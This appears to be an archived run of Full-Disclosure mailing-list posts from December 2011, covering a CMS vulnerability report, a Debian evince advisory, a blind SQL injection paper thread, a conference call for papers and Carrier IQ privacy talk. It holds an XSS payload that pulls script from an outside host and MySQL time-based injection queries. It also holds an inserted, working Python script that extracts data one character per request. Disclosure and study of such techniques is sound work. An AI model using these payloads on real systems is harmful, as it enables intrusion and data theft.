Re: [Full-disclosure] fast and somewhat reliable cache timing

2011-12-04 Thread Michal Zalewski
> http://lcamtuf.coredump.cx/cachetime/

OK, just for the record: I improved the original PoC quite a bit, and
added experimental variants for other browsers. I will shut up now.

/mz

___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full-disclosure-charter.html
Hosted and sponsored by Secunia - http://secunia.com/


Re: [Full-disclosure] Vulnerabilities in Zeema CMS

2011-12-04 Thread Henri Salo
On Sun, Dec 04, 2011 at 03:00:42AM +0200, MustLive wrote:
> Hello list!
> 
> I want to warn you about Brute Force, Cross-Site Scripting and Full path
> disclosure vulnerabilities in Zeema CMS. It's a Ukrainian commercial CMS.
> 
> ------------------
> Affected products:
> ------------------
> 
> Vulnerable are all versions of Zeema CMS.
> 
> --------
> Details:
> --------
> 
> Brute Force (WASC-11):
> 
> http://site/cms/
> 
> XSS (WASC-08):
> 
> http://site/search/?query=%22%20style=%22-moz-binding:url(http://websecurity.com.ua/webtools/xss.xml%23xss)
> 
> The attack will work in Mozilla and Firefox.
> 
> Full path disclosure (WASC-13):
> 
> http://site/search/?page=10&query=site
> 
> ---------
> Timeline:
> ---------
> 
> 2011.09.12 - found vulnerabilities during an audit. After that the client
> straight away informed the developers.
> 2011.10.22 - announced at my site.
> 2011.10.23 - informed the developers.
> 2011.12.02 - disclosed at my site.
> 
> I mentioned these vulnerabilities at my site
> (http://websecurity.com.ua/5459/).
> 
> Best wishes & regards,
> MustLive
> Administrator of Websecurity web site
> http://websecurity.com.ua

Again some never-heard-of software. Where does one find this on the internet? Is
there an item in an issue or bug tracker for this?

- Henri Salo



[Full-disclosure] [SECURITY] [DSA 2357-1] evince security update

2011-12-04 Thread Yves-Alexis Perez
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

- -
Debian Security Advisory DSA-2357-1   secur...@debian.org
http://www.debian.org/security/ Yves-Alexis Perez
December 03, 2011  http://www.debian.org/security/faq
- -

Package: evince
Vulnerability  : several
Problem type   : remote
Debian-specific: no
CVE ID : CVE-2010-2640 CVE-2010-2641 CVE-2010-2642 CVE-2010-2643
Debian Bug : 609534

Jon Larimer from IBM X-Force Advanced Research discovered multiple
vulnerabilities in the DVI backend of the evince document viewer:

CVE-2010-2640

Insufficient array bounds checks in the PK fonts parser could lead
to function pointer overwrite, causing arbitrary code execution.

CVE-2010-2641

Insufficient array bounds checks in the PK fonts parser could lead
to function pointer overwrite, causing arbitrary code execution.

CVE-2010-2642

Insufficient bounds checks in the AFM fonts parser when writing
data to a memory buffer allocated on heap could lead to arbitrary
memory overwrite and arbitrary code execution.

CVE-2010-2643

Insufficient check on an integer used as a size for memory
allocation can lead to arbitrary write outside the allocated range
and cause arbitrary code execution.

For the oldstable distribution (lenny), this problem has been fixed in
version 2.22.2-4~lenny2.

For the stable distribution (squeeze), CVE-2010-2640, CVE-2010-2641
and CVE-2010-2643 have been fixed in version 2.30.3-2 but the fix for
CVE-2010-2642 was incomplete. The final fix is present in version
2.30.3-2+squeeze1.

For the testing distribution (wheezy), this problem has been fixed in
version 3.0.2.

For the unstable distribution (sid), this problem has been fixed in
version 3.0.2.

We recommend that you upgrade your evince packages.

Further information about Debian Security Advisories, how to apply
these updates to your system and frequently asked questions can be
found at: http://www.debian.org/security/

Mailing list: debian-security-annou...@lists.debian.org
-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.9 (GNU/Linux)

iQEcBAEBAgAGBQJO21HvAAoJEL97/wQC1SS+JxMIAK29WNymDBn531GMOwTdaCi9
rkRDz1sg44KyXuoXaP9H15TMtOgfG7bIp6CvrasPNRH5Sh9l6PfLtbadREheZ8+p
/fRLE9d83v/X+8tlaRx4LDWMpaQzifhzuHWC4pY5ULTbBlJQv+B4b3PcbPAI3sWV
ol8/9G4cemg26Mv20fBO6LamDr9muWeU3BT6VoT58cUJBqpSxEkEpBL1CrUunhNx
rOasd67gVUNmeByg8CYAO37jjzqa8goqHRRM9bMOKcDXLgI5OpWHt2TNRkFo0rMR
PyxwC2TiFiHQI24Ck2nJx3HZnEUjRsAcnZkZZFIsClFz0gMudamuGGY55+lR5uU=
=sbHj
-END PGP SIGNATURE-

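
As an added check that is not part of the advisory or of Debian's tooling: the
snippet below reimplements dpkg's version ordering (epoch, then upstream
version, then Debian revision; digit runs compared numerically; '~' sorting
before everything, including the end of the string) and reports which of the
four CVEs are still open for an installed evince version on a given suite. The
suites and fixed-in versions are taken from the advisory text; the installed
versions fed in are constructed, and the squeeze split (2.30.3-2 closes three
CVEs, 2.30.3-2+squeeze1 the fourth) and the lenny '~lenny2' revision are the
cases that a plain string comparison gets wrong.

```python
"""Which DSA-2357-1 CVEs remain open for an installed evince version.

Added example, not part of the advisory. The comparison below follows the
dpkg algorithm (epoch, upstream, revision; digit runs numeric; '~' lowest).
Fixed-in versions per suite are copied from the advisory text.
"""

ALL = ("CVE-2010-2640", "CVE-2010-2641", "CVE-2010-2642", "CVE-2010-2643")

# (fixed-in version, CVEs that version closes), per suite, from the advisory.
FIXED = {
    "lenny":   [("2.22.2-4~lenny2", set(ALL))],
    "squeeze": [("2.30.3-2", {"CVE-2010-2640", "CVE-2010-2641", "CVE-2010-2643"}),
                ("2.30.3-2+squeeze1", {"CVE-2010-2642"})],
    "wheezy":  [("3.0.2", set(ALL))],
    "sid":     [("3.0.2", set(ALL))],
}


def _order(c):
    """dpkg character weight: '~' < end-of-string/digit < letters < other."""
    if c.isdigit():
        return 0
    if c.isalpha():
        return ord(c)
    if c == "~":
        return -1
    if c:
        return ord(c) + 256
    return 0


def _at(s, k):
    return s[k] if k < len(s) else ""


def _verrevcmp(a, b):
    """Compare an upstream-version or revision pair the way dpkg does."""
    i = j = 0
    while i < len(a) or j < len(b):
        first_diff = 0
        # Non-digit run: compare by character weight, '~' sorts below ''.
        while (i < len(a) and not a[i].isdigit()) or (j < len(b) and not b[j].isdigit()):
            wa, wb = _order(_at(a, i)), _order(_at(b, j))
            if wa != wb:
                return wa - wb
            i += 1
            j += 1
        # Digit run: numeric comparison, leading zeros ignored.
        while _at(a, i) == "0":
            i += 1
        while _at(b, j) == "0":
            j += 1
        while _at(a, i).isdigit() and _at(b, j).isdigit():
            if not first_diff:
                first_diff = ord(a[i]) - ord(b[j])
            i += 1
            j += 1
        if _at(a, i).isdigit():
            return 1        # a has more digits left, so it is the larger number
        if _at(b, j).isdigit():
            return -1
        if first_diff:
            return first_diff
    return 0


def _split(version):
    """'[epoch:]upstream[-revision]' -> (epoch, upstream, revision)."""
    epoch, rest = (version.split(":", 1) if ":" in version else ("0", version))
    if "-" in rest:
        upstream, revision = rest.rsplit("-", 1)
    else:
        upstream, revision = rest, ""
    return int(epoch), upstream, revision


def dpkg_compare(a, b):
    """Negative, zero or positive, like `dpkg --compare-versions`."""
    ea, ua, ra = _split(a)
    eb, ub, rb = _split(b)
    if ea != eb:
        return ea - eb
    return _verrevcmp(ua, ub) or _verrevcmp(ra, rb)


def open_cves(suite, installed):
    """CVEs from DSA-2357-1 not closed by the installed evince version."""
    remaining = set(ALL)
    for fixed_in, closes in FIXED[suite]:
        if dpkg_compare(installed, fixed_in) >= 0:
            remaining -= closes
    return sorted(remaining)


if __name__ == "__main__":
    # Constructed installed versions, one per suite.
    for suite, installed in [("lenny", "2.22.2-4~lenny1"), ("squeeze", "2.30.3-2"),
                             ("squeeze", "2.30.3-2+squeeze1"), ("sid", "3.0.1-1")]:
        print(suite, installed, "open:", open_cves(suite, installed) or "none")
```

The installed version is what `dpkg-query -W -f='${Version}' evince` prints; note
that a squeeze host at exactly 2.30.3-2 still shows CVE-2010-2642 open, which is
the incomplete-fix case the advisory calls out.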


[Full-disclosure] Recruiting Troopers - Call for Papers, March 21-22 2012

2011-12-04 Thread Enno Rey
Once more, it will be Troopers time.

This year was an extraordinary event. Everybody involved had so much fun (in 
the end, the term "best security con. ever" got a bit overstressed ;-) and we 
had so many great talks... it seems quite difficult to do even better next 
year. Still, we'll try.
You can be part of it. Again, Troopers - www.troopers.de - will be held in the 
beautiful city of Heidelberg/Germany (on 03/21 and 03/22 2012) and will feature 
two tracks, one on attack techniques and security research, the other focused 
on the defense side and management aspects of the infosec world. You might look 
at http://www.troopers.de/wp-content/uploads/2011/04/TR11_Enno_Rey_Keynote_Day01.pdf
to get an idea of the spirit of the event.


This call for papers addresses security researchers interested in sharing their 
work with other researchers and a high level audience (composed of about 75% 
people from industry and 25% from academia). We would like to invite everyone 
with special knowledge in breaking security in whatever area or practical 
experience in securing complex information systems to present their skills, 
tools or experience.


Speaker Privileges
==================

We will cover the flight costs (limited to EUR 750 for speakers from Europe and 
US$ 1800 for speakers from other continents) and three nights of accommodation, 
plus "some evening fun and other amenities". To get an idea of our speaker 
treatment see http://www.elladodelmal.com/2010/03/como-una-rockn-roll-star.html 
;-)


"Fresh Headz"
=============

Given an appropriate subject and technical level we're happy to welcome "fresh 
speakers" (not seen in various places before) and we're happy to help you with 
setting up your talk (or getting over your pre-talk excitement).



Submissions
===========

We are mainly interested in talks on

Security in a Mobile World
Virtualization & Cloud Stuff
Embedded Devices
Industrial Networking
Security in Telco Environments
Secure Coding & Advances in the Software Security Space
Feasible Risk Assessment Approaches
Digital Certificates in 2012


Obviously heavy vendor-pitching will not be welcomed warmly and we reserve the 
right to ask for modifications of confirmed talks if we have the impression 
there's too much of that in a talk. 


CFP submissions [to c...@troopers.de] must include the following information: 

1) Brief biography including list of publications and papers published 
previously. 

2) Proposed presentation title & synopsis/description.

3) Contact Information (full name, alias, handle, e-mail, postal address, 
phone, country of origin, special meal requirement, smoking habits ;-).

4) Employment and/or affiliations information. 
 
5) Why is your material different or innovative or significant?

Please note that all speakers will be allocated 55 minutes of presentation time 
+ 5 minutes Q+A. Any speakers who require more time must inform the CFP 
committee in the course of the submission.

By agreeing to speak at Troopers 12 you are granting ERNW GmbH the rights to 
reproduce, distribute, advertise and show your presentation including but not 
limited to http://www.troopers.de, printed and/or electronic advertisements, 
and all other mediums.

 

Important Dates
===============

Deadline for Submission: 15 Dec 2011,
Final Notification: 5 Jan 2012,
Presentation slides due: 10 Mar 2012
The conference: 21-22 Mar 2012


===============

thanks,

Enno


-- 
Enno Rey

ERNW GmbH - Breslauer Str. 28 - 69124 Heidelberg - www.ernw.de
Tel. +49 6221 480390 - Fax 6221 419008 - Cell +49 174 3082474
PGP FP 055F B3F3 FE9D 71DD C0D5  444E C611 033E 3296 1CC1

Handelsregister Mannheim: HRB 337135
Geschaeftsfuehrer: Enno Rey

===
Blog: www.insinuator.net || Conference: www.troopers.de
===



Re: [Full-disclosure] Indexed blind SQL injection

2011-12-04 Thread Владимир Воронцов
Hm...
What's new?

http://websec.ca/blog/view/optimized_blind_sql_injection_data_retrieval
http://qwazar.ru/?p=26 [Google translate it]
https://rdot.org/forum/showthread.php?p=15425 [Google translate it]

On Sat, 3 Dec 2011 08:49:37 -0800, Nam Nguyen wrote:
> ===========================
> Indexed blind SQL injection
> ===========================
>
> :Author: gamma95  and his minions
> :Date: December 03, 2011
>
>
> Time based blind SQL attack suffers from low bit/request ratio. Each
> request produces only one valuable bit of information. This paper
> describes a tweak that produces higher yield at the expense of longer
> runtime. Along the way, some issues and notes of applicability are
> also discussed.
>
>
> Background
> ++++++++++
>
> The time based blind SQL injection attack is probably the most well-known
> technique on the planet. The method works by analyzing the time
> difference in various queries. Because query execution time is a side
> effect of a query, no visible output is required for this method to
> succeed. For example, a query could request that the DBMS sleep for
> 10 seconds if the first character of the username is ``A``.
>
> Usually, the time based technique goes hand in hand with binary search.
> Instead of asking if the first character is ``1``, then ``2``, then
> ``3``, it could partition the possible values into two ranges (say
> from ``0`` to ``4`` and ``5`` to ``9``) and ask if the first character
> is less than ``5``. Depending on the result, it picks out the more
> likely range and repeats the process until there is only one possible
> value. This effectively puts a logarithmic bound on the number of
> requests to the DBMS.
>
> In other words, each request gives us one bit of information.
>
>
> Increasing the usable bit/request ratio
> +++++++++++++++++++++++++++++++++++++++
>
> Due to the low bit/request ratio, an attack attempt usually leaves behind
> too many requests in the access log. This is undesirable.
>
> A better approach could be to encode the correct value into the query
> execution time itself. For example, if we know the value is a number
> from 0 to 9, we could ask the DBMS to sleep for that many seconds
> straight. In this case, one request carries more than 3 bits of usable
> information.
>
> This is the principal idea behind our tweak.
>
>
> Indexed time based attack
> +++++++++++++++++++++++++
>
> To encode more bits into the execution time, we must work with
> variable numeric delay values. Therefore, we need two things:
>
> + A measurable delay interval. Too short an interval and network
> latency could negatively affect our measurement. Too long a delay
> will also waste our time.
>
> + And its mapping to target values. A delay of one second could
> mean character ``A`` or it could also mean some other value, depending
> on the possible domain.
>
> These necessitate an array-like index search. Say, if our domain is
> ten (character) values from ``0`` to ``9``, then we can easily combine
> them into an array like shown below.
>
> ::
>
>1   2   3   4   5   6   7   8   9  10   (index)
>|   |   |   |   |   |   |   |   |   |
>v   v   v   v   v   v   v   v   v   v
>  +---+---+---+---+---+---+---+---+---+---+
>  | 0 | 1 | 2 | 3 | 4 | 5 | 6 | 7 | 8 | 9 | (value)
>  +---+---+---+---+---+---+---+---+---+---+
>
> Given a random character, we can tell in one request if it is in this
> set, and if it is, what specific character it actually is. The way to
> do that is by delaying query time by the index of the character. If
> the input character is not in the set, there will be no delay. If it
> is, its index is determinable from the sleep time.
>
>
> An example
> ++++++++++
>
> Suppose we are trying to grab version information from a **MySQL**
> server. Possible characters include 0-9 and period. Observe the
> execution time.
>
> ::
>
> select sleep(find_in_set(mid(@@version, 1, 1),
> '0,1,2,3,4,5,6,7,8,9,.'));
> 1 row in set (6.04 sec)
> # index 6, value '5'
>
> select sleep(find_in_set(mid(@@version, 2, 1),
> '0,1,2,3,4,5,6,7,8,9,.'));
> 1 row in set (11.00 sec)
> # index 11, value '.'
>
> select sleep(find_in_set(mid(@@version, 3, 1),
> '0,1,2,3,4,5,6,7,8,9,.'));
> 1 row in set (2.00 sec)
> # index 2, value '1'
>
> ...
>
> Each request gives us exactly one character (not bit).
>
>
> Notes of applicability
> ++++++++++++++++++++++
>
> Adjusting sleep time
> --------------------
>
> A faster sleep time is easily achievable by multiplying the index with
> some factor smaller than 1. For example, we can sleep half the time as
> before::
>
> select sleep(0.5 * find_in_set(mid(@@version, 1, 1),
> '0,1,2,3,4,5,6,7,8,9,.'));
> 1 row in set (3.00 sec)
> # index 6, value '5'
>
> Similarly, a longer sleep time can use factors greater than 1.
>
> Guarding against network latency
> --------------------------------
>
> Time based attack generally works best in a fast and reliable
> network
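
The indexed time based technique quoted above, as an added example that is not
code from the paper or from the reply: it builds the paper's MySQL payload
(``SLEEP(k * FIND_IN_SET(MID(@@version, p, 1), set))``), maps a measured delay
back to a FIND_IN_SET index, and runs the one-character-per-request loop. The
target is a constructed stand-in for a MySQL server so the script runs offline;
the version string, the per-index factor and the worst-case jitter bound are
assumptions. It also covers the failure mode the paper only implies: a zero
delay is returned both at the end of the string and for a character outside the
set, so the loop stops at the first character it cannot index.

```python
"""Indexed time-based blind SQL injection: one character per request.

Added example, not code from the paper or the reply. Assumed: the MySQL
payload shape the paper uses, a worst-case network jitter of MAX_JITTER
seconds, and a constructed server stand-in (FakeMySQL) in place of a real
database so the script runs offline without sleeping.
"""
import random
import re

CHARSET = ["0", "1", "2", "3", "4", "5", "6", "7", "8", "9", "."]
UNIT = 0.5         # seconds of sleep per index step (the paper's "factor")
MAX_JITTER = 0.2   # assumed worst-case added latency; must stay below UNIT / 2


def build_payload(position, charset=CHARSET, unit=UNIT):
    """Query that sleeps unit * (1-based index of the character in charset)."""
    return "SELECT SLEEP(%g * FIND_IN_SET(MID(@@version, %d, 1), '%s'))" % (
        unit, position, ",".join(charset))


def decode_index(elapsed, unit=UNIT):
    """Round a measured delay to the nearest index; 0 means no delay at all.

    Rounding is only safe while every jitter is below unit / 2, which is why
    the factor cannot be shrunk arbitrarily on a slow or noisy network.
    """
    return int(round(elapsed / unit))


def extract(oracle, charset=CHARSET, unit=UNIT, max_len=64):
    """Recover a string one character per request until a zero delay is seen.

    oracle(sql) returns the seconds the query took. A zero delay is produced
    both by the end of the string (MID() yields '') and by a character that
    is not in charset, so the two cases cannot be told apart from timing.
    """
    recovered = []
    for position in range(1, max_len + 1):
        index = decode_index(oracle(build_payload(position, charset, unit)), unit)
        if index == 0:
            break
        recovered.append(charset[index - 1])
    return "".join(recovered)


_PAYLOAD_RE = re.compile(
    r"SELECT SLEEP\(([\d.]+) \* FIND_IN_SET\(MID\(@@version, (\d+), 1\), '([^']*)'\)\)")


class FakeMySQL:
    """Constructed stand-in for the target: evaluates the payload and returns
    the time the real query would have taken, with seeded jitter, no sleep."""

    def __init__(self, version, max_jitter=MAX_JITTER, seed=1):
        self.version = version
        self.max_jitter = max_jitter
        self.rng = random.Random(seed)
        self.requests = 0

    def elapsed(self, sql):
        m = _PAYLOAD_RE.fullmatch(sql)
        if not m:
            raise ValueError("unsupported query: %s" % sql)
        unit, position = float(m.group(1)), int(m.group(2))
        members = m.group(3).split(",")
        ch = self.version[position - 1:position]           # MID() is 1-based, '' past the end
        index = members.index(ch) + 1 if ch in members else 0  # FIND_IN_SET() semantics
        self.requests += 1
        return unit * index + self.rng.uniform(0, self.max_jitter)


if __name__ == "__main__":
    db = FakeMySQL("5.1.41-3")       # constructed version string
    print(extract(db.elapsed), "recovered in", db.requests, "requests")
```

Against a real server the oracle is simply the round-trip time of the injected
request. With UNIT at 0.5 s the eleven-member set costs at most 5.5 s per
character, and the extra zero-delay request at the end is what terminates the
loop; widening the set (for example to hex digits or letters) raises both the
per-character ceiling and the number of bits each request yields.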

Re: [Full-disclosure] Carrier IQ for your phone

2011-12-04 Thread coderman
On Sat, Dec 3, 2011 at 4:14 AM, Alan J. Wylie
 wrote:
>...
> | Yes, Carrier IQ is a vast digital fishing net that sees geographic
> | locations and the contents of text messages and search queries
> | swimming inside the phones the software monitors.. But except
> | in rare circumstances, that data is dumped out of a phone's internal
> | memory almost as quickly as it goes in.


one thing many of these stories seem to miss is that
these limits assume a carrier in control and acting responsibly.

if you're under a MitM attack these "not used" features sitting latent
are now actively acting against your interests.

similar to CALEA capabilities leveraged for clandestine surveillance,
 e.g. the Athens Affair...



Re: [Full-disclosure] fast and somewhat reliable cache timing

2011-12-04 Thread xD 0x41
hey!

OK, tested THIS variant, and it seems to gather *some* info, so it is
working, although this is using private browsing; the other one by the
other person failed completely (visipi)..
Interesting is what results it gathered... Flickr and Newegg, but no
ebay or paypal :s I guess they have a higher level of sec...
very cool stuff mick!
drew


On 4 December 2011 19:51, Michal Zalewski  wrote:
>> http://lcamtuf.coredump.cx/cachetime/
>
> OK, just for the record: I improved the original PoC quite a bit, and
> added experimental variants for other browsers. I will shut up now.
>
> /mz



Re: [Full-disclosure] Carrier IQ for your phone

2011-12-04 Thread Dave
-BEGIN PGP SIGNED MESSAGE-
Hash: SHA1

On 04/12/2011 19:20, coderman wrote:
> On Sat, Dec 3, 2011 at 4:14 AM, Alan J. Wylie
>  wrote:
>> ...
>> | Yes, Carrier IQ is a vast digital fishing net that sees geographic
>> | locations and the contents of text messages and search queries
>> | swimming inside the phones the software monitors.. But except
>> | in rare circumstances, that data is dumped out of a phone's internal
>> | memory almost as quickly as it goes in.
> 
> 
> one thing many of these stories seem to miss is that
> these limits assume a carrier in control and acting responsibly.
> 
> if you're under a MitM attack these "not used" features sitting latent
> are now actively acting against your interests.
> 
> similar to CALEA capabilities leveraged for clandestine surveillance,
>  e.g. the Athens Affair...

Whatever the case, the fact that this software *can* monitor and record the I/O 
(regardless of what it may or may not ignore) of a device means
it should be removed/blocked or fed noise by anyone who values their privacy.

If one doesn't have total control over any device that one uses to process 
info/data that one would rather not be shared, then who does have the
control and what will they do with that information? Targeted advertising is 
the least innocuous of possibilities

But hey, I am talking to a list of people that should know this ;-) Sorry for 
not telling you something you don't know.

I use a Nokia 6170; it must be getting on for 7 or 8 years old now, and the 
battery is getting a little tired.

Take care... watch ya back

Dave

-BEGIN PGP SIGNATURE-
Version: GnuPG v1.4.2 (MingW32)
Comment: Using GnuPG with Mozilla - http://enigmail.mozdev.org/

iQEVAwUBTtwBYrIvn8UFHWSmAQJQ6gf7BCN+uFWDuMcZ0tVnBTpg0KekAUsG9v+g
cqCCrWr5m5GbTU91/Qb2qTVCPx8e7omZqDpyVGx0MN30g2Z59NuMpMuM2uGdPdXv
sW0wInNSZmNuhsUyWAoVtBhbS7Vir/Pwm5t2lrrJQqqWEUJF1R+gVibGGXhC9lgD
e+qechei6NASiYqMzwWDynG0MjMSxnmKF3VaW7+8oqHoXgQFVdKwU5c+U9KF20iQ
SmF+WmBzxLu5jbRt2TUmv2rKeq65XMOJbI1CPiVMsSPg5vHgVNzAIFNCyqxPDnXb
ZLufl8xMmUsbUkbyXJ254PfQ7Qlcp1qI0+yVIztTqMYiEa06YpMuUA==
=Zg+r
-END PGP SIGNATURE-
